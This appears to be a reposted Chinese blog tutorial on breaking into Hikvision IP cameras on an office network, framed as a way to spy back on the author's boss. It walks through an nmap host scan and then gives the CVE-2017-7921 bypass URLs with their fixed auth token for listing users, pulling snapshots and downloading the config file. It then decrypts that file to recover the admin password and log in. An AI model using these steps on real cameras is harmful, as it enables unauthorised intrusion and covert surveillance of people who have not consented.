前言

之前在公司上班的时候，看到办公室周围都是摄像头，偶然就想能不能破解摄像头反监控老板呢，然后围绕着这个目的一步步开展下去，最后还是让我发现了漏洞，下面我根据我的历程来一步步的来情景再现这个情节。注：此教程仅供学习参考，不涉及任何以破坏为目的的违法犯罪

一：摄像头检测

1.局域网存活主机扫描

因为摄像头是网络摄像头，所以每个摄像头都会对应一个ip，我们需要先确定摄像头的ip才可以进行下一步的操作。这边我们利用nmap来扫描存活主机，再将存活主机进行枚举来确定哪一个是网络摄像头。

nmap：端口扫描工具，有多种版本和格式，这里我使用kali自带的版本，如没有namp可自行下载

在kali终端模拟器中输入以下命令

namp -sP 192.168.1.1/24  //查看192.168.1.1全网段下的主机

2.ip枚举

因为网络摄像头基本上都开着80端口，可以使用web登录。我们一步步来枚举以上获得的ip地址。通过枚举我们可以发现，第一个ip是ikuai软路由网关，第二个和以后的则是网络摄像头海康威视，我随机打开一个，如下图所示

如图，如果想要登录则需要用户名和密码，但漏洞审查的时候发现这个海康威视有一个致命的漏洞CVE-2017-7921

二：漏洞利用

1.检索用户与用户列表

在web浏览器中输入以下代码来检索用户与用户列表

http://your-ip/Security/users?auth=YWRtaW46MTEK

your-ip需要换成你需要破解的摄像头ip，我的为192.168.1.3

我输入的代码如下

http://192.168.1.3/Security/users?auth=YWRtaW46MTEK

浏览器输入结果如下图所示

从上图可知，这个摄像头有且只有一个用户名:admin

2.获取监控快照

在没有进行身份验证的情况下获取监控快照可以使用以下代码在浏览器中打开

http://your-ip/onvif-http/snapshot?auth=YWRtaW46MTEK  //your-ip需要换成需破解摄像头的ip

我输入的代码如下

http://192.168.1.3/onvif-http/snapshot?auth=YWRtaW46MTEK

浏览器返回结果如下

3.下载摄像头配置账号密码文件

在没有验证的情况下需要使用如下代码来下载摄像头的配置文件

http://your-ip/System/configurationFile?auth=YWRtaW46MTEK  //your-ip需要换成要破解的ip

我输入的代码如下

http://192.168.1.3/System/configurationFile?auth=YWRtaW46MTEK

代码输入之后浏览器会自动下载一个名为configurationFile的文件，如下

现在我们已近获取到了摄像头的配文件

三：文件解密

1.配置文件解码

在上面我们已近得到了海康威视摄像头的配置文件了，但是配置文件是加密过的，我们没有办法从中直接得到密码。所以我们需要先将配置文件进行解密，这里我们需要用到一个专门的海康威视配置文件解密工具
下载地址1：CSDN中下载

需要积分下载

下载地址2：外网下载

可以直接下载,不需要登录不需要积分

下载完成后，直接点开软件即可使用，界面如下

点击下图所示按钮打开配置文件

打开配置文件，会弹出一个弹框，问你打开的文件是加密文件还是解密文件，我们打开的是加密文件，按照如下所示打开就行

按照如下图所示顺序解密文件并保存

2.查找密码

上面我们已经将加密的配置文件解密成功了，现在我们需要一个工具打开解密后的配置文件——wxMEdit
下载地址：官网下载
下载完成后直接解压就行，找到解压目录下的wxmedit.exe文件双击打开

打开该工具后，点击-》文件-》打开文件，打开我们之前解密的配置文件，如下图

点击-》查找-》查找，输入admin，点击查找下一个按钮，直到找到密码

如上图，可以看出密码为abc12345,密码破译成功

四：登录验证

输入用户名密码，登录成功，说明破解是成功的，其他的摄像头也可以依次按照此方式破解。

来源：freebuf.com 2021-06-23 16:55:37 by: xiaoziboke